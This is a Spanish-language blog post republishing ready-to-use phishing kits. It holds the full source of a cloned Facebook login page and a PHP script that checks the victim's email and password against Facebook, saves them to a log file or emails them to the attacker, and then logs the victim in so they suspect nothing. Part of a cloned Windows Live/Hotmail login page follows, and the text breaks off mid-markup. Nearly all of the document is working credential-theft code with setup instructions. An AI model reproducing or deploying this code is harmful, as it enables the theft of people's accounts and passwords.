sábado, 3 de septiembre de 2011

SCAM de Facebook y Windows Live - password validos sin CURL - By l0ve

Publicado por OverNet en sábado, septiembre 03, 2011 ,
Aclaro que estos SCAMS no fueron modificados ni creados por mí, tampoco soy responsable de que un visitante haga con esta información.

Autor: l0ve
Tipo: PHP/XHTML
Objeto (s): SCAM (Facebook & Windows Live)

¿Diferencia en este a un SCAM común?
Autentificación:
Envía logs al email del atacante:
CURL: No (No es necesario tener activado CURL en el archivo PHP.ini)
Archivo (s)/Code (s): 2 (index.php y login.php)
Autoconfigurable: (Desde el código login.php)

Según el autor escribió esto al inicio:
Bueno les traigo este code que solo acepta password validos de Facebook! .. además de eso enviá un formulario y autentifica como si nada hubiera pasado así disminuyendo las sospechas y con muchos más
buenos resultados .. también tiene unas configuraciones simples para que los logs se envíen al email, se escriban en un archivo o ninguna de las opciones .. cambiar el nombre del log etc .. todo se configura en el code. bueno son dos archivos que tienen que subir al servidor (index.php y login.php) y sobre todo no bloquea la cuenta!, sin más que decir acá les dejo el code:

SCAM Facebook
SCAM Facebook sin CURL (Imagen de l0ve)

Archivo index.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="es" />
<!--- by l0ve -->
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._is_quickling_index="";if(window==window.top)window.Log=(function(){function g(){var n=Math.random();var o='';for(var m=0;m<4;m++){n=n*62;var p=Math.floor(n)%62;if(p>=10&&p<36){p=String.fromCharCode(p-10+65);}else if(p>=36&&p<62)p=String.fromCharCode(p-36+97);o+=p;}return o;}var k='_e_',l=(window.name||'').toString();l=(l.length==7&&k==l.substr(0,3))?l.substr(3):(window.name=k+g()).substr(3);var i=k+l+'_',f=new Date(+new Date()+604800000).toGMTString(),d=window.location.hostname.replace(/^.*(facebook\..*)$/i,'$1'),e='; expires='+f+';path=/; domain='+d,c=0,h=false,j=[];var b=function(m){return i+(c++)+'='+encodeURIComponent(m)+e;};var a=function(n){var o=(document.cookie.search(k)>=0);while(j.length>0){var p=b(j[0]);if(o&&((document.cookie.length+p.length)>3950||document.cookie.split(';').length>19))break;window.EagleEyeDev&&window.console&&console.log(j[0],'=>',p);document.cookie=p;o=true;j.shift();}if(!!n||!h&&o&&((document.cookie.length>2500||document.cookie.split(';').length>15))&&window.Arbiter&&window.OnloadEvent&&Arbiter.query(OnloadEvent.ONLOAD)){var m=new Image();h=true;m.onload=function(){h=false;a();};if(window.Env&&Env.tracking_domain){host=Env.tracking_domain;}else host='';m.src=host+'/ajax/nectar.php?asyncSignal='+(Math.floor(Math.random()*10000)+1)+'&'+(!n?'':'s=')+(+new Date());}};return function(q,m,o){var r=[l,+new Date(),q].concat(m);r.push(r.length);for(var n=0;n<r.length;n++)if(typeof r[n]=='string'){r[n]='"'+r[n].replace(/\"/g,'\\"').replace(/\n/g,'\\n')+'"';}else if(r[n]===null)r[n]='null';var p='['+r.join(',')+']';if(!o){j.push(p);}else document.cookie=b(p);a(o);};})();
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/login.php?login_attempt=1&_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir,noindex,nofollow,noarchive,nosnippet" />
<meta name="description" content="¡Bienvenido a Facebook en Español (España)! Facebook es una herramienta social que pone en contacto a personas con sus amigos y otras personas que trabajan, estudian y viven en su entorno. Facebook se emplea para estar en contacto con amigos, cargar un número ilimitado de fotos, compartir enlaces y vídeos, y saber más sobre las personas conocidas." />
<link rel="alternate" media="handheld" href="https://login.facebook.com/login.php?login_attempt=1" />
<title>Entrar | Facebook</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/zX/r/40wgXfrItJZ.css" />

    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/zR/r/uLunNI83puZ.css" />
    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/zP/r/Kmpi8qxO3TD.css" />
    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/zr/r/8HTqcvpP4ZQ.css" />

    <script type="text/javascript" src="https://s-static.ak.facebook.com/rsrc.php/zA/r/m5vC-jWmTKp.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="https://s-static.ak.facebook.com/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="https://s-static.ak.facebook.com/rsrc.php/z7/r/5875srnzL-I.ico" /></head>
<body class="login_page UIPage_LoggedOut ff3 Locale_es_ES">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Ir a la página de inicio de Facebook"><i class="fb_logo img spritemap_dq167d sx_29842d" title="Logo de Facebook"></i></a><div class="rfloat"></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" href="/r.php?locale=es_ES"><span class="uiButtonText">Regístrate</span></a><span class="signup_box_content"><span>Facebook te ayuda a comunicarte y compartir tu vida con las personas que conoces.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage mhl mts interstitialHeader"><div class="clearfix uiHeaderTop"><div class="uiHeaderActions rfloat"></div><div><h2 class="uiHeaderTitle">Entrar en Facebook</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="login_form_container"><form method="POST" action="./login.php?login_attempt=1" id="login_form"><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="Nth2y" autocomplete="off" /><div id="loginform" style=""><input type="hidden" id="return_session" name="return_session" value="0" autocomplete="off" /><input type="hidden" id="legacy_return" name="legacy_return" value="1" autocomplete="off" /><input type="hidden" id="display" name="display" value="" autocomplete="off" /><input type="hidden" id="session_key_only" name="session_key_only" value="0" autocomplete="off" /><input type="hidden" id="trynum" name="trynum" value="1" autocomplete="off" /><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="Nth2y" autocomplete="off" /><div class="form_row clearfix "><label for="email" id="label_email" class="login_form_label">Correo electrónico:</label><input type="text" class="inputtext" id="email" name="email" value="" onkeypress="formchange()" /></div><div class="form_row clearfix "><label for="pass" id="label_pass" class="login_form_label">Contraseña:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div><label class="persistent"><input type="checkbox" class="inputcheckbox " checked="checked" id="persistent_inputcheckbox" name="persistent" value="1" /><span id="persistent_login_text">No cerrar sesión</span></label><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><label class="uiButton uiButtonConfirm uiButtonLarge"><input value="Entrar" name="login" onclick="" type="submit" /></label> o <strong><a href="http://www.facebook.com/r.php?possible_fb_user=1&app_id=0&is_enabled=1&next=&locale=es_ES" target="_blank" rel="nofollow" id="reg_btn_link" tabindex="-1">Regístrate en Facebook</a></strong></div><p class="reset_password form_row"><a href="http://www.facebook.com/reset.php?locale=es_ES" target="" tabindex="-1">¿Has olvidado tu contraseña?</a></p></div></form>

</div></div></div><div class="linear_language"><ul class="uiList uiListHorizontal clearfix"><li class="uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("es_LA", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="Spanish">Español</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("es_ES", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="Spanish (Spain)">Español (España)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("ar_AR", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="Arabic">العربية</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("en_US", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="English (US)">English (US)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("pt_BR", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="Portuguese (Brazil)">Português (Brasil)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("fr_FR", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="French (France)">Français (France)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("de_DE", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="German">Deutsch</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("it_IT", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="Italian">Italiano</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("hi_IN", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="Hindi">हिन्दी</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://login.facebook.com/login.php?login_attempt=1" onclick="intl_set_cookie_locale("zh_CN", "https:\/\/login.facebook.com\/login.php?login_attempt=1", "TOP_LOCALES"); return false;" title="Simplified Chinese (China)">中文(简体)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a class="chevron" rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1&source=TOP_LOCALES_DIALOG" title="Mostrar más idiomas">»</a></li></ul></div></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div class="lfloat"><div class="uiTextSubtitle"><span title="HPHP - 37 - TUzm9T6twAmhYR7uS1XgjQ - 17408"> Facebook © 2010</span></div></div><div class="uiTextSubtitle rfloat"><a href="http://www.facebook.com/facebook" accesskey="8" title="Lee nuestro blog, descubre el centro de recursos y encuentra ofertas de trabajo.">Acerca de </a> · <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=0" title="Anúnciate en Facebook.">Publicidad</a> · <a href="http://developers.facebook.com/?ref=pf" title="Desarrolla en nuestra plataforma.">Desarrolladores</a> · <a href="http://www.facebook.com/careers/?ref=pf" title="Realiza tu próximo cambio de empleo en nuestra extraordinaria empresa.">Empleo</a> · <a href="http://www.facebook.com/privacy/explanation.php" title="Infórmate acerca de tu privacidad y Facebook.">Privacidad</a> · <a href="http://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Consulta nuestras condiciones de servicio.">Condiciones</a> · <a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visita nuestro Servicio de ayuda.">Servicio de ayuda</a></div></div></div></div><script type="text/javascript">/* <![CDATA[ */if (top != self) { try { if (parent != top) { throw 1; } var disallowed = ["apps.facebook.com","\/pages\/"]; href = top.location.href.toLowerCase(); for (var i = 0; i < disallowed.length; i++) { if (href.indexOf(disallowed[i]) >= 0) { throw 1; } } } catch (e) {setTimeout(function() {var fb_cj_img = new Image(); fb_cj_img.src = "http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&m=on%09&t=8850";}, 5000); window.document.write("<style>body * { display:none !important; }<\/style><a href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display: block !important; padding: 10px\"><i class=\"img spritemap_2rry0p sx_0fdace\" style=\"display:block !important\"><\/i>Ir a Facebook.com<\/a>");/* ZjQYX8x1 */ }}/* ]]> */</script><script type="text/javascript">
Env={user:0,locale:"es_ES",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:313612,static_base:"https:\/\/s-static.ak.facebook.com\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"hmKip",lhsh:"cf6c6",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1",ffid1:"1x1GdSQOvKxDkbHPvfwy5g",ffid2:"--C8Vj1pdZ2ADZG-5PmDhg",ffid3:"QXp2UVRFS00zRUw0Q09YSnNjVkF1M0RS",ffid4:"oTjPGVC7UZYUKPiZodghYw",ffver:58931};

</script>

  <script type="text/javascript">Bootloader.setResourceMap({"JjMwq":{"name":"css\/ew5fdpag53sc484c.pkg.css","type":"css","permanent":1,"src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zX\/r\/40wgXfrItJZ.css"},"r\/gWs":{"name":"css\/3xjd0tbhjmg4cgw0.pkg.css","type":"css","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zR\/r\/uLunNI83puZ.css"},"olbS\/":{"name":"css\/ae00p9rwk9c80oww.pkg.css","type":"css","permanent":1,"src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zP\/r\/Kmpi8qxO3TD.css"},"CAWAV":{"name":"css\/15ailo1sju4gw8k0.pkg.css","type":"css","permanent":1,"nonblocking":1,"src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zr\/r\/8HTqcvpP4ZQ.css"},"2ba9z":{"name":"css\/db8rqkhncp44ck40.pkg.css","type":"css","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zF\/r\/4U8a0bv7Kuk.css"}});Bootloader.setResourceMap({"yokD9":{"name":"js\/4xuosto3egw000co.pkg.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zk\/p\/r\/4644EezZZLz.js"},"dZmKL":{"name":"js\/cv4867olo3cwsk8w.pkg.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zn\/p\/r\/SR5K60LfXvm.js"},"RpPeo":{"name":"js\/bmq929sp95w04swo.pkg.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zA\/r\/m5vC-jWmTKp.js"},"RffYz":{"name":"js\/photos\/inline_editor.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zi\/p\/r\/ps0nGykogRg.js"},"m96u2":{"name":"js\/photos\/PhotoTheater.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zJ\/p\/r\/M6fiRMaBO0R.js"},"MybL4":{"name":"js\/photos\/PhotoTagger.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zQ\/p\/r\/89_G2iK0LAe.js"},"LSVhT":{"name":"js\/8hmteb85xag40o4o.pkg.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zm\/p\/r\/o8AxxOqZKRc.js"},"w7NeV":{"name":"js\/photos\/TagToken.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zB\/p\/r\/mfT91VIcqu6.js"},"+r4bX":{"name":"js\/photos\/TagTokenizer.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zm\/p\/r\/X3GaUlN71qz.js"},"sgZDr":{"name":"js\/detect_broken_proxy_cache.js","type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/zK\/p\/r\/HWL11JhzW9w.js"}});
Bootloader.enableBootload({"async":["RpPeo","yokD9","JjMwq"],"dialog":["RpPeo","yokD9","JjMwq"],"dom-form":["RpPeo","yokD9","JjMwq"],"PhotoTheater":["RpPeo","yokD9","JjMwq","2ba9z","RffYz","m96u2"],"PhotoTagger":["RpPeo","yokD9","JjMwq","MybL4"],"TagToken":["RpPeo","yokD9","LSVhT","w7NeV"],"TagTokenizer":["RpPeo","yokD9","LSVhT","w7NeV","JjMwq","2ba9z","RffYz","m96u2","+r4bX"],"async-signal":["yokD9"],"detect-broken-proxy-cache":["yokD9","RpPeo","sgZDr"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function(){setTimeout(function() {InitialJSLoader.load(["yokD9","dZmKL"]);Arbiter.inform("BOOTLOAD\/ROADRUNNER_READY", true, Arbiter.BEHAVIOR_STATE);}, 50)}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);</script><script type="text/javascript">
Bootloader.configurePage(["JjMwq","r\/gWs","olbS\/","CAWAV"]);
Bootloader.done(["js\/lib\/util\/log.js","js\/login.js"]);


onloadRegister(function (){window.loading_page_chrome = true;;});
onloadRegister(function (){window.intl_locale_rewrites = {"meta":{"\/_B\/":"^(.*[.,!?\\s]|)","\/_E\/":"([.,!?\\s].*|)$"},"patterns":{"\/_By \u0001([Ii]|[Hh]i[^e])\/":"$1e \u0001$2","\/_Bo \u0001([Oo]|[Hh]o)\/":"$1u \u0001$2","\/_\u0001([^\u0001]*)\u0001\/e":"mb_strtolower(\"\u0001$1\u0001\")","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}};;});
onloadRegister(function (){window.loading_page_chrome = false;;});
onloadRegister(function (){useragent();;});
onafterloadRegister(function (){Bootloader.loadComponents(["detect-broken-proxy-cache"], function(){ detect_broken_proxy_cache("0", "c_user") });;});

</script><script type="text/javascript">if(!window.ge)window.ge=function(a){return document.getElementById(a);};window.onload=function(a){return function(){var b=ge('email'),c=ge('pass');try{if(b&&!b.value){b.focus();}else if(c)c.focus();}catch(d){if(!(d.number==-2146826178))throw d;}return a&&a.call(window);};}(window.onload);function formchange(){(ge('persistent')||{}).checked=0;}function pop(a){window.open(a);}</script></body>
</html>


Archivo login.php
<?php
## Code by l0ve
## hecho por l0ve
## l0ve.diosdelared.com
//Config.
//Configuraciones agregadas for newbies
//Para las opciones:
//"1" - es igual a SI
//"0" - es igual a NO
//pueden estar actividas o desactivadas todas las opciones o una de ellas.

//opciones:

//Que lleguen las contraseñas al e-mail? Por defecto: 0

$enviar_al_email = "0";

## Code by l0ve
## hecho por l0ve
## l0ve.diosdelared.com
//Direccion de email donde llegaran las contraseñas?

$config_email = "TU@EMAIL.etc";

//Guardar en archivo?

$guardar_en_archivo = "1";

//Nombre de archivo y ruta donde se guardaran? Por defecto: ./log.txt
$config_archivo = "./log.txt";

//Cadena para buscar en el code de Face?

$exp = "Perfil";  //No modificar sin conocimientos

// Fin config.
## Code by l0ve
## hecho por l0ve
## l0ve.diosdelared.com

//De aca para abajo no tocar sin conocer

$user = $_POST[email];
$pass = $_POST[pass];
#by l0ve

$opciones = array('http' =>
array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
'User-Agent' => 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16',
'Referer' => 'http://facebook.com',
        'content' => "email=$user&pass=$pass"
    )


);
$contexto  = stream_context_create($opciones);
$resultado = file_get_contents('http://www.facebook.com/login.php?m=m', false, $contexto);
if(preg_match("/$exp/i", $resultado)) {
if($enviar_al_email == 1) {
mail("$config_email", "Te llego un pass. de Face.", "usuario: $user\npassword: $pass");
}

if($guardar_en_archivo == 1) {
$fd=fopen("$config_archivo",'a');
fwrite($fd,"Usuario: $user\r\nContraseña:$pass\n\n");
fclose($fd);
}
echo "<body onload=\"document.formulario.submit()\">

<form action=\"https://login.facebook.com/login.php\" method=post name=formulario>

<input type=hidden name=email value=$user>

<input type=hidden name=pass value=$pass>

</body>

</form>";
} else {
header("Location: index.php");
}
?>


SCAM Windows Live Hotmail.

Windows Live Hotmail - SCAM sin CURL
Archivo index.php

<!-- ServerInfo: BAYIDSLGN1F53 2011.07.22.19.28.58 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDB117,  -- Version: 11,0,18491,0 -->
<!-- RequestLCID: 11274, Market:ES-AR, PrefCountry: AR, LangLCID: 3082, LangISO: ES -->
<html dir="ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=5"><script type="text/javascript">var g_dtFirstByte=new Date();</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=ES-AR&lc=11274"/>Windows Live ID requiere JavaScript para iniciar sesión. Este explorador web no admite JavaScript o las secuencias de comandos están bloqueadas.<br /><br />Para averiguar si el explorador admite JavaScript o para permitir las secuencias de comandos, consulte la ayuda en pantalla del explorador.</noscript><title>Iniciar sesión</title><meta name="description" content="El nuevo Hotmail ya está aquí. Es un sistema de correo electrónico eficaz y gratuito con las características de seguridad de Microsoft, 2 GB de espacio, un nuevo diseño y una seguridad mejorada. Estamos seguros de que te va a encantar."><meta name="PageID" content="i5030"><meta name="SiteID" content="64855"><meta name="ReqLC" content="11274"><meta name="LocLC" content="3082"><script type="text/javascript"></script><link rel="shortcut icon" href="https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.1.15/%7E/%7E/%7E/%7E/images/favicon.ico">
<link rel="image_src" href="https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.1.15/%7E/%7E/%7E/%7E/images/Windows_Live_v_thumb.jpg">

<link rel="stylesheet" title="R3CSS" type="text/css" href="Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/css/R3WinLive3082.css"><style type="text/css">
body{display:none;}
.cssBtnRest input{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/btnbkgnd_rest.gif);}
.cssBtn input{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/utbkgnd.gif);}
.cssLT{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/utbkgnd.gif);}
.cssLTMore{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/utbkgnd.gif);}
.cssWLGradientIMG,.cssWLGradientIMGSSL{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/wave3header.jpg);}
.higbutton{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/btnbkgnd_rest.gif);}
.higbuttonblue{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/btnbkgnd_hot.gif);}
div.wlid_errorholder{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/icon_error_24x24.png);}
</style>
<script type="text/javascript">if (top != self){ try{ top.location.replace(self.location.href);}catch (e){ }}else{ document.write(unescape('%3C%73') + 'tyle type="text/css">body{display:block !important;}</style>');}</script><style type="text/css">body{display:block !important;}</style><script src="https://secure.shared.live.com/~Live.SiteContent.ID.HMCustomization/~1.0.26/~/~/~/~/mai/SSL/ES-AR/header.js" id="idCustomJS9" type="text/javascript"></script></head>
<body onload="WLWorkflow();">

<table cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td id="i0272" align="center"><div class="cssWLGradientCommon cssWLGradientIMG" id="GradientDiv"><table style="width: 890px;" cellpadding="0" cellspacing="0"><tbody><tr><td style="height: 50px;"></td></tr><tr><td><span class="cssIconMapClip clip175x23 cssLogo"><img src="https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.15/~/~/~/~/images/iconmap.png" class="cssIconMapImg iconmap_windowslive" title="Windows Live ID" alt="Windows Live ID" id="i2036"></span><span class="cssHeaderText" id="i0257"></span></td></tr></tbody></table></div><div style="height: 20px;"></div></td></tr><tr><td id="shellTD" align="center"><table style="width: 890px;" id="shellTBL" cellpadding="0" cellspacing="0"><tbody><tr><td><table id="ctTBL" cellpadding="0" cellspacing="0"><tbody><tr><td id="mainTD"><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align: top; width: 511px;" id="brandModeTD"><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td style="width: 16px;"></td><td style="width: 475px;" id="productTD"><div style="margin: 0px; padding: 0px; background-color: #ffffff; color: #444444;"> <div style="width: 475px; height: 400px;"> <img src="https://secure.shared.live.com/~Live.SiteContent.ID.HMCustomization/~1.0.25/~/~/~/~/mai/images/hotmail.png" alt="Hotmail" style="margin: 0px 0px 15px;" border="0" height="36" width="161"> <h3 style="font-family: Verdana, Arial, Sans-Serif; font-size: 15px; line-height: 15px; font-weight: normal; color: #0066cc; margin: 0px 0px 27px 15px; padding: 0px;">La manera eficiente de administrar el correo electrónico</h3> <table style="width: 475px;" border="0" cellpadding="0" cellspacing="0"> <tbody><tr> <td style="text-align: center; vertical-align: top; width: 40px; height: 48px; padding-top: 5px;"> » </td> <td style="vertical-align: top; width: 435px; height: 48px;"> <p style="font-family: Verdana, Arial, Sans-Serif; font-size: 11px; line-height: 13px; margin: 6px 15px 0px 0px; padding: 0px;">Combate el correo no deseado con la tecnología SmartScreen de Microsoft</p> </td> </tr> <tr> <td style="text-align: center; vertical-align: top; width: 40px; height: 48px; padding-top: 5px;"> » </td> <td style="vertical-align: top; width: 435px; height: 48px;"> <p style="font-family: Verdana, Arial, Sans-Serif; font-size: 11px; line-height: 13px; margin: 6px 15px 0px 0px; padding: 0px;">Administra todas tus cuentas de correo electrónico con una sola aplicación</p> </td> </tr> <tr> <td style="text-align: center; vertical-align: top; width: 40px; height: 48px; padding-top: 5px;"> » </td> <td style="vertical-align: top; width: 435px; height: 48px;"> <p style="font-family: Verdana, Arial, Sans-Serif; font-size: 11px; line-height: 13px; margin: 6px 15px 0px 0px; padding: 0px;">Consulta tu correo electrónico con el teléfono móvil</p> </td> </tr> <tr> <td style="vertical-align: top; width: 40px; height: 48px;"> </td> <td style="vertical-align: top; width: 435px; height: 48px;"> <a href="http://explore.live.com/windows-live-hotmail" style="font-family: Verdana,Arial,Sans-Serif; font-size: 11px; line-height: 13px; margin: 10px 0px 0px; padding: 0px; color: rgb(0, 102, 204); font-weight: bold; text-decoration: none;">Más información ></a> </td> </tr> </tbody></table> <table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td id="signuptd" colspan="2"><table class="cssSignupTbl" cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align: bottom;"><div class="cssSignupText">¿No tienes una cuenta de Hotmail?</div></td><td title="¿No tienes una cuenta de Hotmail?"><input id="i0010" onclick="document.location.href=srf_uReg;" class="cssSignupBtn" value="Registro" type="button"></td></tr></tbody></table></td></tr></tbody></table> <p style="font-family: Verdana, Arial, Sans-Serif; font-size: 10px; line-height: 12px; margin: 10px 0px 0px 0px; padding: 0px;">Consigue un Windows Live ID y podrás tener acceso a <strong>Hotmail, Messenger, Xbox LIVE</strong>y otros servicios de Microsoft.</p> </div></div></td><td style="width: 20px;"></td></tr></tbody></table></td><td style="vertical-align: top;" id="signInTD"><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td></td><td class="cssSubHeader" id="titleTD"><div style="font-size: 100%;" id="idSUHeader9">iniciar sesión</div></td></tr><tr><td style="width: 21px; vertical-align: top;"><table cellpadding="0" cellspacing="0"><tbody><tr><td id="separatorTD"><label> </label></td></tr></tbody></table></td><td style="vertical-align: top;"><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td id="rightTD"><div id="idDiv_Tile_Layout0"><form target="_top" method="POST" name="f1" action="post.php?wa=wsignin1.0&rpsnv=11&ct=1314559524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=11274&id=64855&mkt=es-ar&cbcxt=mai&snsc=1&bk=1314559565"><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td><table id="idTbl_Tile_ActiveLayout0" cellpadding="0" cellspacing="0"><tbody><tr><td colspan="2"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="" class="wlid_errorholder" id="idTd_Tile_Error0"><table cellpadding="0" cellspacing="0"><tbody><tr><td class="cssErrorImg"><span title="Símbolo de error" id="idImg_Tile_Error0" class="cssIconMapClip clip16x16"><img src="https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E16.1.15/%7E/%7E/%7E/%7E/images/iconmap.png" class="cssIconMapImg iconmap_icon_err"></span></td><td class="cssError"><span>La dirección de correo electrónico o la contraseña son incorrectas. Vuelva a intentarlo.</span></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td colspan="2"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="display: none;" class="wlid_errorholder" 